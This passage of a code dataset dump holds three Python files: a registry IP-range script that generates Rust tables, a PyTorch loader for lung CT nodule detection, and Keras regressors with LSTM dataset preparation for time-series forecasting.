start_number > end_number:\n raise ValueError('Ooops ...')\n else:\n raise ValueError('Ooops ...')\n else:\n raise ValueError('Ooops ...')\n\ndef ip_classful(s):\n # https://en.wikipedia.org/wiki/Classful_network#Classful_addressing_definition\n if \".\" in s:\n # IPv4\n number = ipv4_to_u64(s)\n bits = bin(number).replace(\"0b\", \"\").rjust(32, \"0\")\n if number >= 0b11110000000000000000000000000000 and number <= 0b11111111111111111111111111111111:\n # 240.0.0.0 - 255.255.255.255\n return 
\"E\"\n elif bits.startswith(\"1110\"):\n # 224.0.0.0 - 239.255.255.255\n return \"D\"\n elif bits.startswith(\"110\"):\n # 192.0.0.0 - 223.255.255.255\n return \"C\"\n elif bits.startswith(\"10\"):\n # 128.0.0.0 - 191.255.255.255\n return \"B\"\n elif bits.startswith(\"0\"):\n # 0.0.0.0 - 127.255.255.255\n return \"A\"\n else:\n raise ValueError('Ooops ...')\n else:\n # IPv6\n return \"N/A\"\n\ndef ip_subnet_mask(s):\n classful = ip_classful(s)\n if classful == 'A':\n return ipv4_to_u64(\"255.0.0.0\")\n elif classful == 'B':\n return ipv4_to_u64(\"255.255.0.0\")\n elif classful == 'C':\n return ipv4_to_u64(\"255.255.255.0\")\n elif classful == 'D':\n raise ValueError(\"not defined\")\n elif classful == 'E':\n raise ValueError(\"not defined\")\n elif classful == 'N/A':\n # IPv6\n # a:b:c:d:e:f:g:h\n # Network address: 00 - 48 bits (a, b, c)\n # Subnet address : 48 - 64 bits (d, )\n # Device address : 64 - 128 bits (e, f, g, h)\n return \"ffff:ffff:ffff:ffff::\"\n else:\n raise ValueError(\"Ooops ...\")\n\n\ndef gen_asn_code():\n pass\n\ndef gen_ip_code(registry_name, ip_version, country, records):\n data = []\n counts = {}\n ext_data = {}\n\n for (registry, cc, _type, start, value, date, status, extensions) in records:\n # ('ripencc', 'ZZ', 'ipv6', '2a0d:d080::', 25, '', 'available', ())\n if registry_name == 'iana':\n _c = status\n else:\n _c = cc\n\n if registry == registry_name and _type == ip_version and country == _c:\n if ip_version == \"ipv4\":\n value = value - 1\n start_ipv4_u64 = ipv4_to_u64(start)\n if start_ipv4_u64 in data:\n if counts[start_ipv4_u64] != value:\n raise ValueError(\"Ooops ...\")\n else:\n data.append(start_ipv4_u64)\n counts[start_ipv4_u64] = value\n ext_data[start_ipv4_u64] = (cc, status)\n elif registry == registry_name and ip_version == \"ipv6\" and country == _c:\n try:\n start_ipv6_u128, end_ipv6_u128 = ipv6_range_block(start, prefix=value)\n except Exception as e:\n logger.error(registry, cc, _type, start, value, date, status, extensions)\n raise e\n end_ipv6_nums = end_ipv6_u128 - start_ipv6_u128\n\n if start_ipv6_u128 in data:\n if counts[start_ipv6_u128] != end_ipv6_nums:\n raise ValueError(\"Ooops ...\")\n else:\n data.append(start_ipv6_u128)\n counts[start_ipv6_u128] = end_ipv6_nums\n ext_data[start_ipv6_u128] = (cc, status)\n\n data.sort()\n while 1:\n num = 0\n idx = 0\n while idx < len(data) - 1:\n if data[idx] + counts[data[idx]] == data[idx+1]:\n counts[data[idx]] += counts[data[idx+1]]\n data.remove(data[idx+1])\n num += 1\n idx += 1\n if num == 0:\n break\n \n res = []\n for ip_number in data:\n ip_nums = counts[ip_number]\n cc, status = ext_data[ip_number]\n end_ip = ip_number + ip_nums\n if ip_version == \"ipv4\":\n assert(end_ip <= 4294967295)\n elif ip_version == \"ipv6\":\n assert(end_ip <= 340282366920938463463374607431768211455)\n res.append((registry_name, COUNTRY_CODES.index(cc), ip_number, end_ip, status))\n\n return res\n\n\ndef get_china_ipv4_list():\n pass\n\ndef codegen():\n pass\n\n\ndef test():\n # print(ip_cidr(\"0.0.0.1\"))\n # print(ipv4_to_u64(\"0.0.0.0\"))\n print(ip_cidr(\"61.5.208.0\", \"61.5.208.0\"))\n print(ip_cidr(\"61.5.208.0\", \"61.5.223.255\"))\n print(ip_cidr(\"103.43.155.0\", \"103.43.155.255\"))\n\n print(ip_cidr(\"2001:268:2000::\", \"2001:268:3fff:ffff:ffff:ffff:ffff:ffff\"))\n\n print(ip_classful(\"61.5.208.0\"))\n print(ip_classful(\"103.43.157.100\"))\n print(ip_classful(\"255.255.255.255\"))\n\n return\n start, end = ipv4_range_block(\"103.43.156.0\", prefix=26)\n print(end-start, u64_to_ipv4(start), 
u64_to_ipv4(end))\n # print(ipaddress.IPv4Network(\"103.43.156.0/22\").num_addresses)\n\n start, end = ipv6_range_block(\"2001:268:2000::\", prefix=35)\n print(end-start, u128_to_ipv6(start), u128_to_ipv6(end))\n # print(ipaddress.IPv6Network(\"2001:268:2000::/35\").num_addresses)\n\n # return\n print(ipv6_to_u128( \"2001:268:2000::\" ))\n print(ipv6_to_u128( \"2001:268:2000::2:3\" ))\n print(ipv6_to_u128( \"::2001:268:2000\" ))\n\n # print(ipv6_to_u128( str(ipaddress.IPv6Address(\"2001:268:2000::\").exploded) ))\n # print(ipaddress.IPv6Address(42540536976427471861665356247566647296).exploded)\n print(u128_to_ipv6(42540536976427471861665356247566647296))\n\n\ndef main():\n records = json.loads(open(\"data/records.json\", \"rb\").read().decode(\"UTF-8\"))\n # registries = ('afrinic', 'apnic', 'arin', 'iana', 'ietf', 'lacnic', 'ripencc')\n # (registry, country_code, ip_number, ip_nums, status)\n status_set = [\"afrinic\", \"allocated\", \"apnic\", \"arin\", \"assigned\", \"available\", \"iana\", \"ietf\", \"lacnic\", \"reserved\", \"ripencc\"]\n\n _registries = registries\n for registry in _registries:\n logger.info(\"Handle registry %s ...\", registry)\n if registry == \"ietf\":\n continue\n\n path = \"src/number/db/%s.rs\" % registry\n mod_path = \"src/number/db/mod.rs\"\n\n open(path, \"wb\").write(b\"\")\n\n data_v4 = []\n data_v6 = []\n ccodes = COUNTRY_CODES\n if registry == \"iana\":\n ccodes = ('afrinic', 'apnic', 'arin', 'ietf', 'lacnic', 'ripencc')\n for ccode in ccodes:\n data_v4.extend(gen_ip_code(registry, \"ipv4\", ccode, records))\n data_v6.extend(gen_ip_code(registry, \"ipv6\", ccode, records))\n \n v4_values = {}\n for x in data_v4:\n v4_values[x[2]] = (x[3], x[1], status_set.index(x[4]) )\n v6_values = {}\n for x in data_v6:\n v6_values[x[2]] = (x[3], x[1], status_set.index(x[4]) )\n\n data_v4 = list(map(lambda n: (n, v4_values[n][0], v4_values[n][1], v4_values[n][2] ), sorted(list(map(lambda r: r[2], data_v4)))))\n data_v6 = list(map(lambda n: (n, v6_values[n][0], v6_values[n][1], v6_values[n][2] ), sorted(list(map(lambda r: r[2], data_v6)))))\n v4_values = None\n v6_values = None\n\n data_len = len(data_v4)\n\n rust_code = \"#[feature(i128_type)]\\n\\n\"\n rust_code += \"pub static IPV4_NUMBERS: [(u32, u32, u8, u8); %d] = [\\n \" % (len(data_v4), )\n idx = 0\n for x in data_v4:\n idx += 1\n if idx % 6 == 0:\n rust_code += \"\\n \"\n\n rust_code += \"(%d, %d, %d, %d), \" % (x[0], x[1], x[2], x[3])\n rust_code += \"\\n];\\n\\n\"\n\n rust_code += \"pub static IPV6_NUMBERS: [(u128, u128, u8, u8); %d] = [\\n \" % ( len(data_v6), )\n idx = 0\n for x in data_v6:\n idx += 1\n if idx % 4 == 0:\n rust_code += \"\\n \"\n\n rust_code += \"(%d, %d, %d, %d), \" % (x[0], x[1], x[2], x[3])\n rust_code += \"\\n];\\n\"\n\n open(path, \"ab\").write(rust_code.encode(\"UTF-8\"))\n \n rust_mod_code = \"\\n\\n\"\n for x in _registries:\n if x != \"ietf\":\n rust_mod_code += \"pub mod %s;\\n\" % x\n\n open(mod_path, \"wb\").write(rust_mod_code.encode(\"UTF-8\"))\n \n\nif __name__ == '__main__':\n logging.basicConfig(\n format = 'PID %(process)d %(asctime)s \\x1b[32m%(levelname)-7s\\x1b[0m %(threadName)-14s %(name)-15s %(message)s',\n datefmt = '%Y-%m-%d %H:%M:%S',\n level = logging.DEBUG\n )\n\n logging.getLogger(\"chardet.charsetprober\").setLevel(logging.CRITICAL)\n logging.getLogger(\"chardet.universaldetector\").setLevel(logging.CRITICAL)\n\n signal.signal(signal.SIGINT, signal.SIG_DFL)\n signal.signal(signal.SIGSEGV, signal.SIG_DFL)\n signal.signal(signal.SIGCHLD, signal.SIG_IGN)\n\n 
main()","sub_path":"iana/scripts/ipdb_codegen.py","file_name":"ipdb_codegen.py","file_ext":"py","file_size_in_byte":14966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"85582574","text":"import numpy as np\nimport torch\nfrom torch.utils.data import Dataset\nimport os\nimport time\nimport collections\nimport random\nfrom layers import iou\nfrom scipy.ndimage import zoom\nimport warnings\nfrom scipy.ndimage.interpolation import rotate\n\nclass DataBowl3Detector(Dataset):\n def __init__(self, data_dir, split_path, config, phase = 'train',split_comber=None):\n assert(phase == 'train' or phase == 'val' or phase == 'test')\n self.phase = phase\n self.max_stride = config['max_stride'] \n self.stride = config['stride'] \n sizelim = config['sizelim']/config['reso']\n sizelim2 = config['sizelim2']/config['reso']\n sizelim3 = config['sizelim3']/config['reso']\n self.blacklist = config['blacklist']\n self.isScale = config['aug_scale']\n self.r_rand = config['r_rand_crop']\n self.augtype = config['augtype']\n self.pad_value = config['pad_value']\n self.split_comber = split_comber\n idcs = np.load(split_path)\n if phase!='test':\n idcs = [f for f in idcs if (f not in self.blacklist)]\n\n self.filenames = [os.path.join(data_dir, '%s_clean.npy' % idx) for idx in idcs]\n self.kagglenames = [f for f in self.filenames if len(f.split('/')[-1].split('_')[0])>20]\n self.lunanames = [f for f in self.filenames if len(f.split('/')[-1].split('_')[0])<20]\n \n labels = []\n \n for idx in idcs:\n l = np.load(os.path.join(data_dir, '%s_label.npy' %idx))\n if np.all(l==0):\n l=np.array([])\n labels.append(l)\n\n self.sample_bboxes = labels\n if self.phase != 'test':\n self.bboxes = []\n for i, l in enumerate(labels):\n if len(l) > 0 :\n for t in l:\n if t[3]>sizelim:\n self.bboxes.append([np.concatenate([[i],t])])\n if t[3]>sizelim2:\n self.bboxes+=[[np.concatenate([[i],t])]]*2\n if t[3]>sizelim3:\n self.bboxes+=[[np.concatenate([[i],t])]]*4\n self.bboxes = np.concatenate(self.bboxes,axis = 0)\n\n self.crop = Crop(config)\n self.label_mapping = LabelMapping(config, self.phase)\n\n def __getitem__(self, idx,split=None):\n t = time.time()\n np.random.seed(int(str(t%1)[2:7]))#seed according to time\n\n isRandomImg = False\n if self.phase !='test':\n if idx>=len(self.bboxes):\n isRandom = True\n idx = idx%len(self.bboxes)\n isRandomImg = np.random.randint(2)\n else:\n isRandom = False\n else:\n isRandom = False\n \n if self.phase != 'test':\n if not isRandomImg:\n bbox = self.bboxes[idx]\n filename = self.filenames[int(bbox[0])]\n imgs = np.load(filename)\n bboxes = self.sample_bboxes[int(bbox[0])]\n isScale = self.augtype['scale'] and (self.phase=='train')\n sample, target, bboxes, coord = self.crop(imgs, bbox[1:], bboxes,isScale,isRandom)\n if self.phase=='train' and not isRandom:\n sample, target, bboxes, coord = augment(sample, target, bboxes, coord,\n ifflip = self.augtype['flip'], ifrotate=self.augtype['rotate'], ifswap = self.augtype['swap'])\n else:\n randimid = np.random.randint(len(self.kagglenames))\n filename = self.kagglenames[randimid]\n imgs = np.load(filename)\n bboxes = self.sample_bboxes[randimid]\n isScale = self.augtype['scale'] and (self.phase=='train')\n sample, target, bboxes, coord = self.crop(imgs, [], bboxes,isScale=False,isRand=True)\n label = self.label_mapping(sample.shape[1:], target, bboxes)\n sample = (sample.astype(np.float32)-128)/128\n #if filename in self.kagglenames and self.phase=='train':\n # label[label==-1]=0\n return 
torch.from_numpy(sample), torch.from_numpy(label), coord\n else:\n imgs = np.load(self.filenames[idx])\n bboxes = self.sample_bboxes[idx]\n nz, nh, nw = imgs.shape[1:]\n pz = int(np.ceil(float(nz) / self.stride)) * self.stride\n ph = int(np.ceil(float(nh) / self.stride)) * self.stride\n pw = int(np.ceil(float(nw) / self.stride)) * self.stride\n imgs = np.pad(imgs, [[0,0],[0, pz - nz], [0, ph - nh], [0, pw - nw]], 'constant',constant_values = self.pad_value)\n \n xx,yy,zz = np.meshgrid(np.linspace(-0.5,0.5,imgs.shape[1]/self.stride),\n np.linspace(-0.5,0.5,imgs.shape[2]/self.stride),\n np.linspace(-0.5,0.5,imgs.shape[3]/self.stride),indexing ='ij')\n coord = np.concatenate([xx[np.newaxis,...], yy[np.newaxis,...],zz[np.newaxis,:]],0).astype('float32')\n imgs, nzhw = self.split_comber.split(imgs)\n coord2, nzhw2 = self.split_comber.split(coord,\n side_len = self.split_comber.side_len/self.stride,\n max_stride = self.split_comber.max_stride/self.stride,\n margin = self.split_comber.margin/self.stride)\n assert np.all(nzhw==nzhw2)\n imgs = (imgs.astype(np.float32)-128)/128\n return torch.from_numpy(imgs), bboxes, torch.from_numpy(coord2), np.array(nzhw)\n\n def __len__(self):\n if self.phase == 'train':\n return len(self.bboxes)/(1-self.r_rand)\n elif self.phase =='val':\n return len(self.bboxes)\n else:\n return len(self.sample_bboxes)\n \n \ndef augment(sample, target, bboxes, coord, ifflip = True, ifrotate=True, ifswap = True):\n # angle1 = np.random.rand()*180\n if ifrotate:\n validrot = False\n counter = 0\n while not validrot:\n newtarget = np.copy(target)\n angle1 = np.random.rand()*180\n size = np.array(sample.shape[2:4]).astype('float')\n rotmat = np.array([[np.cos(angle1/180*np.pi),-np.sin(angle1/180*np.pi)],[np.sin(angle1/180*np.pi),np.cos(angle1/180*np.pi)]])\n newtarget[1:3] = np.dot(rotmat,target[1:3]-size/2)+size/2\n if np.all(newtarget[:3]>target[3]) and np.all(newtarget[:3]< np.array(sample.shape[1:4])-newtarget[3]):\n validrot = True\n target = newtarget\n sample = rotate(sample,angle1,axes=(2,3),reshape=False)\n coord = rotate(coord,angle1,axes=(2,3),reshape=False)\n for box in bboxes:\n box[1:3] = np.dot(rotmat,box[1:3]-size/2)+size/2\n else:\n counter += 1\n if counter ==3:\n break\n if ifswap:\n if sample.shape[1]==sample.shape[2] and sample.shape[1]==sample.shape[3]:\n axisorder = np.random.permutation(3)\n sample = np.transpose(sample,np.concatenate([[0],axisorder+1]))\n coord = np.transpose(coord,np.concatenate([[0],axisorder+1]))\n target[:3] = target[:3][axisorder]\n bboxes[:,:3] = bboxes[:,:3][:,axisorder]\n \n if ifflip:\n# flipid = np.array([np.random.randint(2),np.random.randint(2),np.random.randint(2)])*2-1\n flipid = np.array([1,np.random.randint(2),np.random.randint(2)])*2-1\n sample = np.ascontiguousarray(sample[:,::flipid[0],::flipid[1],::flipid[2]])\n coord = np.ascontiguousarray(coord[:,::flipid[0],::flipid[1],::flipid[2]])\n for ax in range(3):\n if flipid[ax]==-1:\n target[ax] = np.array(sample.shape[ax+1])-target[ax]\n bboxes[:,ax]= np.array(sample.shape[ax+1])-bboxes[:,ax]\n return sample, target, bboxes, coord \n\nclass Crop(object):\n def __init__(self, config):\n self.crop_size = config['crop_size']\n self.bound_size = config['bound_size']\n self.stride = config['stride']\n self.pad_value = config['pad_value']\n def __call__(self, imgs, target, bboxes,isScale=False,isRand=False):\n if isScale:\n radiusLim = [8.,120.]\n scaleLim = [0.75,1.25]\n scaleRange = [np.min([np.max([(radiusLim[0]/target[3]),scaleLim[0]]),1])\n 
,np.max([np.min([(radiusLim[1]/target[3]),scaleLim[1]]),1])]\n scale = np.random.rand()*(scaleRange[1]-scaleRange[0])+scaleRange[0]\n crop_size = (np.array(self.crop_size).astype('float')/scale).astype('int')\n else:\n crop_size=self.crop_size\n bound_size = self.bound_size\n target = np.copy(target)\n bboxes = np.copy(bboxes)\n \n start = []\n for i in range(3):\n if not isRand:\n r = target[3] / 2\n s = np.floor(target[i] - r)+ 1 - bound_size\n e = np.ceil (target[i] + r)+ 1 + bound_size - crop_size[i] \n else:\n s = np.max([imgs.shape[i+1]-crop_size[i]/2,imgs.shape[i+1]/2+bound_size])\n e = np.min([crop_size[i]/2, imgs.shape[i+1]/2-bound_size])\n target = np.array([np.nan,np.nan,np.nan,np.nan])\n if s>e:\n start.append(np.random.randint(e,s))#!\n else:\n start.append(int(target[i])-crop_size[i]/2+np.random.randint(-bound_size/2,bound_size/2))\n \n \n normstart = np.array(start).astype('float32')/np.array(imgs.shape[1:])-0.5\n normsize = np.array(crop_size).astype('float32')/np.array(imgs.shape[1:])\n xx,yy,zz = np.meshgrid(np.linspace(normstart[0],normstart[0]+normsize[0],self.crop_size[0]/self.stride),\n np.linspace(normstart[1],normstart[1]+normsize[1],self.crop_size[1]/self.stride),\n np.linspace(normstart[2],normstart[2]+normsize[2],self.crop_size[2]/self.stride),indexing ='ij')\n coord = np.concatenate([xx[np.newaxis,...], yy[np.newaxis,...],zz[np.newaxis,:]],0).astype('float32')\n\n pad = []\n pad.append([0,0])\n for i in range(3):\n leftpad = max(0,-start[i])\n rightpad = max(0,start[i]+crop_size[i]-imgs.shape[i+1])\n pad.append([leftpad,rightpad])\n crop = imgs[:,\n max(start[0],0):min(start[0] + crop_size[0],imgs.shape[1]),\n max(start[1],0):min(start[1] + crop_size[1],imgs.shape[2]),\n max(start[2],0):min(start[2] + crop_size[2],imgs.shape[3])]\n crop = np.pad(crop,pad,'constant',constant_values =self.pad_value)\n for i in range(3):\n target[i] = target[i] - start[i] \n for i in range(len(bboxes)):\n for j in range(3):\n bboxes[i][j] = bboxes[i][j] - start[j] \n \n if isScale:\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n crop = zoom(crop,[1,scale,scale,scale],order=1)\n newpad = self.crop_size[0]-crop.shape[1:][0]\n if newpad<0:\n crop = crop[:,:-newpad,:-newpad,:-newpad]\n elif newpad>0:\n pad2 = [[0,0],[0,newpad],[0,newpad],[0,newpad]]\n crop = np.pad(crop,pad2,'constant',constant_values =self.pad_value)\n for i in range(4):\n target[i] = target[i]*scale\n for i in range(len(bboxes)):\n for j in range(4):\n bboxes[i][j] = bboxes[i][j]*scale\n return crop, target, bboxes, coord\n \nclass LabelMapping(object):\n def __init__(self, config, phase):\n self.stride = np.array(config['stride'])\n self.num_neg = int(config['num_neg'])\n self.th_neg = config['th_neg']\n self.anchors = np.asarray(config['anchors'])\n self.phase = phase\n if phase == 'train':\n self.th_pos = config['th_pos_train']\n elif phase == 'val':\n self.th_pos = config['th_pos_val']\n\n \n def __call__(self, input_size, target, bboxes):\n stride = self.stride\n num_neg = self.num_neg\n th_neg = self.th_neg\n anchors = self.anchors\n th_pos = self.th_pos\n \n output_size = []\n for i in range(3):\n assert(input_size[i] % stride == 0)\n output_size.append(input_size[i] / stride)\n \n label = -1 * np.ones(output_size + [len(anchors), 5], np.float32)\n offset = ((stride.astype('float')) - 1) / 2\n oz = np.arange(offset, offset + stride * (output_size[0] - 1) + 1, stride)\n oh = np.arange(offset, offset + stride * (output_size[1] - 1) + 1, stride)\n ow = np.arange(offset, offset + stride * 
(output_size[2] - 1) + 1, stride)\n\n for bbox in bboxes:\n for i, anchor in enumerate(anchors):\n iz, ih, iw = select_samples(bbox, anchor, th_neg, oz, oh, ow)\n label[iz, ih, iw, i, 0] = 0\n\n if self.phase == 'train' and self.num_neg > 0:\n neg_z, neg_h, neg_w, neg_a = np.where(label[:, :, :, :, 0] == -1)\n neg_idcs = random.sample(range(len(neg_z)), min(num_neg, len(neg_z)))\n neg_z, neg_h, neg_w, neg_a = neg_z[neg_idcs], neg_h[neg_idcs], neg_w[neg_idcs], neg_a[neg_idcs]\n label[:, :, :, :, 0] = 0\n label[neg_z, neg_h, neg_w, neg_a, 0] = -1\n\n if np.isnan(target[0]):\n return label\n iz, ih, iw, ia = [], [], [], []\n for i, anchor in enumerate(anchors):\n iiz, iih, iiw = select_samples(target, anchor, th_pos, oz, oh, ow)\n iz.append(iiz)\n ih.append(iih)\n iw.append(iiw)\n ia.append(i * np.ones((len(iiz),), np.int64))\n iz = np.concatenate(iz, 0)\n ih = np.concatenate(ih, 0)\n iw = np.concatenate(iw, 0)\n ia = np.concatenate(ia, 0)\n flag = True \n if len(iz) == 0:\n pos = []\n for i in range(3):\n pos.append(max(0, int(np.round((target[i] - offset) / stride))))\n idx = np.argmin(np.abs(np.log(target[3] / anchors)))\n pos.append(idx)\n flag = False\n else:\n idx = random.sample(range(len(iz)), 1)[0]\n pos = [iz[idx], ih[idx], iw[idx], ia[idx]]\n dz = (target[0] - oz[pos[0]]) / anchors[pos[3]]\n dh = (target[1] - oh[pos[1]]) / anchors[pos[3]]\n dw = (target[2] - ow[pos[2]]) / anchors[pos[3]]\n dd = np.log(target[3] / anchors[pos[3]])\n label[pos[0], pos[1], pos[2], pos[3], :] = [1, dz, dh, dw, dd]\n return label \n\ndef select_samples(bbox, anchor, th, oz, oh, ow):\n z, h, w, d = bbox\n max_overlap = min(d, anchor)\n min_overlap = np.power(max(d, anchor), 3) * th / max_overlap / max_overlap\n if min_overlap > max_overlap:\n return np.zeros((0,), np.int64), np.zeros((0,), np.int64), np.zeros((0,), np.int64)\n else:\n s = z - 0.5 * np.abs(d - anchor) - (max_overlap - min_overlap)\n e = z + 0.5 * np.abs(d - anchor) + (max_overlap - min_overlap)\n mz = np.logical_and(oz >= s, oz <= e)\n iz = np.where(mz)[0]\n \n s = h - 0.5 * np.abs(d - anchor) - (max_overlap - min_overlap)\n e = h + 0.5 * np.abs(d - anchor) + (max_overlap - min_overlap)\n mh = np.logical_and(oh >= s, oh <= e)\n ih = np.where(mh)[0]\n \n s = w - 0.5 * np.abs(d - anchor) - (max_overlap - min_overlap)\n e = w + 0.5 * np.abs(d - anchor) + (max_overlap - min_overlap)\n mw = np.logical_and(ow >= s, ow <= e)\n iw = np.where(mw)[0]\n\n if len(iz) == 0 or len(ih) == 0 or len(iw) == 0:\n return np.zeros((0,), np.int64), np.zeros((0,), np.int64), np.zeros((0,), np.int64)\n \n lz, lh, lw = len(iz), len(ih), len(iw)\n iz = iz.reshape((-1, 1, 1))\n ih = ih.reshape((1, -1, 1))\n iw = iw.reshape((1, 1, -1))\n iz = np.tile(iz, (1, lh, lw)).reshape((-1))\n ih = np.tile(ih, (lz, 1, lw)).reshape((-1))\n iw = np.tile(iw, (lz, lh, 1)).reshape((-1))\n centers = np.concatenate([\n oz[iz].reshape((-1, 1)),\n oh[ih].reshape((-1, 1)),\n ow[iw].reshape((-1, 1))], axis = 1)\n \n r0 = anchor / 2\n s0 = centers - r0\n e0 = centers + r0\n \n r1 = d / 2\n s1 = bbox[:3] - r1\n s1 = s1.reshape((1, -1))\n e1 = bbox[:3] + r1\n e1 = e1.reshape((1, -1))\n \n overlap = np.maximum(0, np.minimum(e0, e1) - np.maximum(s0, s1))\n \n intersection = overlap[:, 0] * overlap[:, 1] * overlap[:, 2]\n union = anchor * anchor * anchor + d * d * d - intersection\n\n iou = intersection / union\n\n mask = iou >= th\n #if th > 0.4:\n # if np.sum(mask) == 0:\n # print(['iou not large', iou.max()])\n # else:\n # print(['iou large', iou[mask]])\n iz = iz[mask]\n ih = ih[mask]\n iw 
= iw[mask]\n return iz, ih, iw\n\ndef collate(batch):\n if torch.is_tensor(batch[0]):\n return [b.unsqueeze(0) for b in batch]\n elif isinstance(batch[0], np.ndarray):\n return batch\n elif isinstance(batch[0], int):\n return torch.LongTensor(batch)\n elif isinstance(batch[0], collections.Iterable):\n transposed = zip(*batch)\n return [collate(samples) for samples in transposed]\n\n","sub_path":"training/detector/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":17665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"54665231","text":"from uin_fc_lib import ts_forecasts, ml_visualizations\nimport pandas as pd\nimport numpy as np\nimport keras as k\nfrom keras.wrappers.scikit_learn import KerasRegressor\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau, TensorBoard\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import Pipeline\nfrom . import utils\nimport hashlib\nfrom . import fc_frame\n\nclass TF_LSTM_Regressor(object):\n def __init__(self, input_dim, validation_ratio=.3, look_back=1):\n # fix random seed for reproducibility\n self.look_back = look_back\n self.validation_ratio = validation_ratio\n seed = 7\n np.random.seed(seed)\n # evaluate model with standardized dataset\n self.input_dim = input_dim\n print(self.input_dim)\n early_stopping = EarlyStopping(monitor='val_loss', patience=5, mode='min')\n reduce_lr_loss = ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=5, verbose=1, epsilon=1e-4,\n mode='min')\n mcp_save = ModelCheckpoint('md.hdf5', save_best_only=True, monitor='val_loss', mode='min')\n estimators = []\n #estimators.append(('standardize', StandardScaler()))\n estimators.append(('mlp', KerasRegressor(\n build_fn=self.baseline_model,\n epochs=50,\n batch_size=256,\n verbose=1,\n callbacks=[early_stopping, reduce_lr_loss], # , mcp_save],\n validation_split=self.validation_ratio\n )))\n self.pipeline = Pipeline(estimators)\n print('model compiled')\n\n # convert an array of values into a dataset matrix\n\n def baseline_model(self):\n # create and fit the LSTM network\n model = k.models.Sequential()\n model.add(k.layers.LSTM(4, input_shape=self.input_dim))\n model.add(k.layers.Dense(1))\n model.compile(loss='mean_squared_error', optimizer='adam')\n return model\n\n def predict(self, X):\n return self.pipeline.predict(X)\n\n def fit(self, X, y):\n self.pipeline.fit(X, y)\n\n\nclass TF_Regressor1(object):\n\n def __init__(self, input_dim, validation_ratio=.3):\n # fix random seed for reproducibility\n self.validation_ratio = validation_ratio\n seed = 7\n np.random.seed(seed)\n # evaluate model with standardized dataset\n self.input_dim = input_dim\n print(self.input_dim)\n early_stopping = EarlyStopping(monitor='val_loss', patience=5, mode='min')\n reduce_lr_loss = ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=5, verbose=1, epsilon=1e-4,\n mode='min')\n mcp_save = ModelCheckpoint('md.hdf5', save_best_only=True, monitor='val_loss', mode='min')\n estimators = []\n estimators.append(('standardize', StandardScaler()))\n estimators.append(('mlp', KerasRegressor(\n build_fn=self.baseline_model,\n epochs=50,\n batch_size=128,\n verbose=1,\n callbacks=[early_stopping, reduce_lr_loss], # , mcp_save],\n validation_split=self.validation_ratio\n )))\n self.pipeline = Pipeline(estimators)\n\n def baseline_model(self):\n model = k.models.Sequential()\n model.add(k.layers.Dense(32, kernel_initializer='normal', input_dim=self.input_dim))\n 
model.add(k.layers.Dropout(.2))\n model.add(k.layers.Activation('relu'))\n model.add(k.layers.Dense(1, kernel_initializer='normal'))\n # also possible is mean_squared_error\n #\n\n model.compile(\n optimizer='adam',\n loss='mean_absolute_error',\n )\n return model\n\n def predict(self, X):\n return self.pipeline.predict(X)\n\n def fit(self, X, y):\n self.pipeline.fit(X, y)\n\n\ndef headline_of_X(df, hide_columns, date_column, target):\n drop_cols = hide_columns\n drop_cols.append(date_column)\n drop_cols.append(target)\n drop_cols.append('index')\n unnamed_cols = df.columns[df.columns.str.startswith('Unnamed:')]\n drop_cols.extend(unnamed_cols)\n return df.columns[~df.columns.isin(drop_cols)]\n\n\ndef train_tf_regressor1_model(\n df=None,\n date_column=None,\n backtest_settings=None,\n target=None,\n hide_columns=None,\n validation_ratio=0\n):\n if backtest_settings is None:\n backtest_settings = {}\n input_dim = len(headline_of_X(df=df, target=target, date_column=date_column, hide_columns=hide_columns))\n # subtract target\n model = TF_Regressor1(input_dim=input_dim, validation_ratio=validation_ratio)\n tfc = ts_forecasts.TFC(df=df, date_column=date_column)\n tfc.train_model(target=target, hide_columns=hide_columns, model=model, **backtest_settings)\n return tfc\n\n\n\ndef train_lstm_regressor_model(\n df=None,\n date_column=None,\n backtest_settings=None,\n target=None,\n hide_columns=None,\n validation_ratio=0.2,\n look_back=5\n):\n df.dropna(inplace=True)\n if backtest_settings is None:\n backtest_settings = {}\n if hide_columns is None:\n hide_columns = []\n input_dim = len(headline_of_X(df=df, target=target, date_column=date_column,\n hide_columns=hide_columns))\n\n print(input_dim)\n\n model = TF_LSTM_Regressor(input_dim=(input_dim, look_back),\n validation_ratio=validation_ratio)\n lstm_columns = hide_columns\n\n lstm_columns.append(target)\n lstm_columns.pop(lstm_columns.index(date_column))\n print(lstm_columns)\n X = create_LSTM_dataset(df[df.columns[~df.columns.isin(hide_columns)]],\n look_back=look_back,\n date_column=date_column)\n\n\n tfc = fc_frame.FF(df=X, date_column=date_column)\n tfc.train(\n target=target,\n hide_columns=hide_columns,\n model=model,\n **backtest_settings)\n y = df[target][look_back : ]\n #model.fit(X, y)\n return X, y, model\n\ndef get_key_for_lstm_dataset(df, date_column, look_back):\n s = df.columns.__str__() + \\\n df[df.columns[0]].__str__() + \\\n df[df.columns[-1]].__str__()\n s = s.encode('utf-8')\n s = hashlib.sha224(s).hexdigest()\n return '%s_%s_%s' % (s, date_column, look_back)\n\n\ndef create_LSTM_dataset(df, date_column, look_back=1):\n\n if not df.index.name == date_column:\n df.set_index(date_column, inplace=True)\n rm = df.ewm(halflife=100).mean()\n rstd = df.ewm(halflife=100).std()\n df = (df - rm) / rstd\n\n df.dropna(inplace=True)\n key = get_key_for_lstm_dataset(df, date_column, look_back)\n df_store = None\n df_store = utils.see_if_in_cache(key)\n if df_store is not None:\n print('processed data loaded from cache')\n return df_store\n utils.assert_date_monotonic_increasing(df=df, date_column=date_column)\n if date_column == df.index.name:\n df.reset_index(inplace=True)\n dataX = []\n for i in range(df.shape[0] - look_back + 1):\n a = df.values[i:(i + look_back), :]\n dataX.append(a)\n X = np.array(dataX)\n X = np.reshape(X, (X.shape[0], look_back, X.shape[2]))\n\n q = pd.DataFrame()\n q[date_column] = df[date_column][:df.shape[0] - look_back + 1]\n q.index.name = '__enum__'\n q.reset_index(inplace=True)\n for i, col in 
